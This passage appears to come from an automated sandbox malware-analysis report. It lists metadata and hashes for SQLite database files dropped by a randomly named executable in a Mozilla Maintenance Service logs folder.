                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
